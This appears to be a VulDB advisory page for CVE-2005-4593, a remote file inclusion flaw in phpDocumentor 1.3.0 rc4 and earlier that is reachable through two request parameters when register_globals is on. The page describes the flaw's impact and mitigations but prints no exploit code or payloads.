CVE-2005-4593 in phpDocumentor
Summary
by MITRE
PHP remote file inclusion vulnerability in phpDocumentor 1.3.0 rc4 and earlier, when register_globals is enabled, allows remote attackers to execute arbitrary code via a URL in the (1) FORUM[LIB] parameter in Documentation/tests/bug-559668.php and (2) the root_dir parameter in docbuilder/file_dialog.php.
Several companies clearly confirm that VulDB is the primary source for best vulnerability data.
Analysis
by VulDB Data Team • 06/26/2025
The vulnerability described in CVE-2005-4593 represents a critical remote file inclusion flaw within the phpDocumentor software ecosystem, specifically affecting versions 1.3.0 rc4 and earlier. This vulnerability exploits a fundamental security weakness that arises when the register_globals PHP configuration setting is enabled, creating an exploitable condition that allows remote attackers to inject malicious code through carefully crafted HTTP parameters. The flaw manifests in two distinct attack vectors within the software's codebase, each targeting different components of the documentation building system.
The technical exploitation occurs through manipulation of HTTP request parameters that are directly incorporated into file inclusion operations without proper validation or sanitization. In the first instance, the FORUM[LIB] parameter within Documentation/tests/bug-559668.php accepts user-supplied input that gets processed through a file inclusion mechanism, while the second vulnerability targets the root_dir parameter in docbuilder/file_dialog.php. Both vectors demonstrate a classic path traversal and code execution vulnerability where attacker-controlled input flows directly into include or require statements, enabling arbitrary code execution on the vulnerable server. This vulnerability directly maps to CWE-88, which describes improper neutralization of special elements used in an expression, and CWE-94, which covers execution of arbitrary code.
The operational impact of this vulnerability extends far beyond simple code execution, as it provides attackers with complete control over the affected server running phpDocumentor. An attacker who successfully exploits this vulnerability can execute arbitrary commands, potentially leading to data theft, server compromise, or further network infiltration. The vulnerability is particularly dangerous in environments where register_globals is enabled, as this configuration setting automatically creates PHP global variables from request parameters, making the application more susceptible to injection attacks. The attack surface is expanded by the fact that both vulnerable files are part of the standard phpDocumentor distribution, meaning that any installation running vulnerable versions is immediately at risk.
Security professionals should note that this vulnerability aligns with ATT&CK technique T1059.007, which describes the use of scripting languages for execution, and T1190, which covers exploitation of remote services. Organizations should immediately upgrade to phpDocumentor versions beyond 1.3.0 rc4 to remediate this vulnerability, as no patches were provided for the affected versions. The recommended mitigation strategy includes disabling register_globals in PHP configuration, implementing proper input validation and sanitization for all user-supplied parameters, and employing web application firewalls to detect and block suspicious parameter patterns. Additionally, network segmentation and access controls should be implemented to limit the potential impact of successful exploitation, while regular security assessments should verify that no other similar vulnerabilities exist within the application codebase.